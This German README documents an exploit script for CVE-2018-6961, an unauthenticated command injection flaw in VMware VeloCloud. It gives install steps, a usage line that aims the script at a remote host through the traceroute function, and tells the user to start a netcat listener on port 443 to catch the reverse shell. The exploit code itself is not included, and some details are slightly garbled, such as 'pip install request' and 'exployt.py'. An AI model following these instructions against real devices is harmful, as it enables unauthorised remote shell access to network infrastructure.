
veloCloud VMWare - Schwachstelle
CVE-2018-6961 – NICHT AUTHENTIFIZIERTE BEFEHLSEINSCHLEUSUNGS-SCHWACHSTELLE
Dieser Exploit funktioniert in Python2.7 – Nicht in anderen Versionen getestet.
1) Abhängigkeiten installieren
pip install request
Wenn pip nicht installiert ist, führen Sie einfach Folgendes aus:
apt-get install python-pip
**2) Verwendung **
python exployt.py --rhost --interface --lhost --lport --function
python exploit.py --rhost 1.1.1.1 --interface ge1 --lhost 2.2.2.2 --lport 443 --function traceroute
Exploiting...................
3) Vergessen Sie nicht, Netcat auf einem anderen Terminal einzurichten
nc -vlnp 443
TODO – Skript verbessern, um Netcat im selben Terminal auszuführen